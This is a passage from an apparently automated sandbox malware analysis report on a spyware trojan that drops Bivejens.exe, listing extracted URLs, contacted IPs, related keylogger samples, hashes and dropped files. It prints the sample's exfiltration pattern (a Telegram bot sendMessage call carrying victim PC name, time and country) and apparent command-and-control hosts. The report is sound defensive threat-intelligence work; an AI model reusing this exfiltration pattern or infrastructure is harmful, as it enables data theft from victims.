https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:06:33%0D%0ACountry%20Name:%20United%20States%0D%0A[%20813848%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20]	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	Bivejens.exe, 00000005.00000002.2610716890.000000001E8B0000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/downloa	Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.office.com/(lm	Bivejens.exe, 00000005.00000002.2610716890.000000001E8A1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	Bivejens.exe, 00000005.00000002.2610716890.000000001E8AB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	TjoY7n65om.exe, Bivejens.exe.2.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	Bivejens.exe, 00000005.00000002.2610716890.000000001E87F000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com	Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813848%0D%0ADate%20a	Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en(lm	Bivejens.exe, 00000005.00000002.2610716890.000000001E870000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	Bivejens.exe, 00000005.00000002.2610716890.000000001E87A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	Bivejens.exe, 00000005.00000002.2610716890.000000001E738000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E77D000.00000004.00000800.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000002.2610716890.000000001E7A3000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/k	Bivejens.exe, 00000005.00000002.2597746067.0000000002638000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	Bivejens.exe, 00000005.00000003.1657636452.00000000026A8000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1657798412.00000000026A8000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/p	Bivejens.exe, 00000005.00000002.2597746067.000000000268E000.00000004.00000020.00020000.00000000.sdmp, Bivejens.exe, 00000005.00000003.1695795682.00000000026A3000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Bivejens.exe, 00000005.00000002.2610716890.000000001E6C1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Bivejens.exe, 00000005.00000002.2613888955.000000001F6E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	Bivejens.exe, 00000005.00000002.2610716890.000000001E70D000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States	15169	GOOGLEUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.80.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
142.250.185.65	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588340
Start date and time:	2025-01-11 00:39:42 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TjoY7n65om.exe renamed because original name is a hash value
Original Sample Name:	fa6b246130a460aa8915db3f56fc3735f767a5950a12d71dc3a70c400682cc41.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/13@5/5
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 98% Number of executed functions: 160 Number of non-executed functions: 155
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
18:40:46	API Interceptor	40x Sleep call for process: powershell.exe modified
18:41:18	API Interceptor	121408x Sleep call for process: Bivejens.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
104.21.80.1	NFhRxwbegd.exe	Get hash	malicious	FormBook	Browse	www.aziziyeescortg.xyz/2pcx/
	qlG7x91YXH.exe	Get hash	malicious	FormBook	Browse	www.mzkd6gp5.top/0hqe/
	6uHfmjGMfL.exe	Get hash	malicious	Amadey	Browse	clientservices.sgoogleapis.observer/api/index.php
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	my.cradaygo.com/smmylet
	SW_48912.scr.exe	Get hash	malicious	FormBook	Browse	www.dejikenkyu.cyou/pmpa/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	hiranetwork.com/administrator/index.php
	downloader2.hta	Get hash	malicious	XWorm	Browse	2k8u3.org/wininit.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	OKkUGRkZV7.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	13.107.246.45
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
	240815025266174071.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	hgq5nzWJll.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	13.107.246.45
	WN9uCxgU1T.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Full-Ver_Setup.exe	Get hash	malicious	LummaC Stealer	Browse	13.107.246.45
	Yef4EqsQha.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	13.107.246.45
checkip.dyndns.com	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	158.101.44.242
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	193.122.6.168
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.6.168
reallyfreegeoip.org	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.32.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.48.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.112.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
api.telegram.org	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	C5JLkBS1CX.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
CLOUDFLARENETUS	phish_alert_sp2_2.0.0.0(4).eml	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://app.online.mt.com/e/es?s=961579678&e=14507707&elqTrackId=4f40dcb3a3854013ad3a46d461cc3aff&elq=5140e028df1a42afab491350388fd129&elqaid=221811&elqat=1&elqcst=272&elqcsid=2325629&elqak=8AF5D97DFF9E423CC7C7524F5CA3C1A86F5F67341B9DF612D5A2FB20DE928F2AA351	Get hash	malicious	Unknown	Browse	172.66.0.227
	https://maya-lopez.filemail.com/t/XhcWEjoR	Get hash	malicious	Unknown	Browse	188.114.96.3
	25IvlOVEB1.exe	Get hash	malicious	FormBook	Browse	104.21.32.1
	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.16.1
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.16.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.96.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.112.1
	Gz2FxKx2cM.exe	Get hash	malicious	FormBook	Browse	104.21.36.62
UTMEMUS	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	6cicUo3f8g.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	7b4Iaf58Rp.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.247.73
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	UF7jzc7ETP.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	wymvwQ4mC4.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
	H75MnQEha8.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.80.1
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.80.1
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.80.1
	Ddj3E3qerh.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.80.1
3b5074b1b5d032e5620f69f9f700ff0e	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	4z8Td6Kv8R.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	cOH7jKmo25.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	3i1gMM8K4z.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2NJzy3tiny.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	z87sammylastborn.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	vnV17JImCH.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	xJZHVgxQul.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	Kb94RzMYNf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	142.250.181.238 142.250.185.65
	WGi85dsMNp.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.65
	TVPfW4WUdj.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.65
	WGi85dsMNp.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.65
	WtZl31OLfA.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.181.238 142.250.185.65
	czHx16QwGQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.65
	Setup.exe	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.185.65
	rXKfKM0T49.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.65
	4Vx2rUlb0f.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.238 142.250.185.65
	b5BQbAhwVD.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.65

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\Bivejens.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	825542
Entropy (8bit):	7.695013315037864
Encrypted:	false
SSDEEP:	12288:wTJidkhIqHdLcMMEbtx0GA72BzYCqqykD0AarMhiNAgZY8i3oXRKQCzcdYSS:wTkQIwL81IBUCqpqrsfZV+ER/c
MD5:	6A5B8C6057DFF681139FD609FFC6B21D
SHA1:	B37B7A2168980B4772978A640EBF5A02F41697E6
SHA-256:	FA6B246130A460AA8915DB3F56FC3735F767A5950A12D71DC3A70C400682CC41
SHA-512:	0BE9C3E2E42B53AC22237F9B2A1037CA4BB46CE908DF0BDBE455EB1DAF41457B6DD85F1D80AEE36F47FA3C6D9CF9D3A9E8867928242EDF8A93AAE21AA703F989
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50% Antivirus: Virustotal, Detection: 65%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L......\.................d...*......Y3............@.......................................@..........................................................................................................................................................text....b.......d.................. ..`.rdata...............h..............@..@.data................\|..............@....ndata... ...............................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Bivejens.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ifjr5aq.2cj.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kb0ozyj.bqh.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gxjsehf.rqv.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
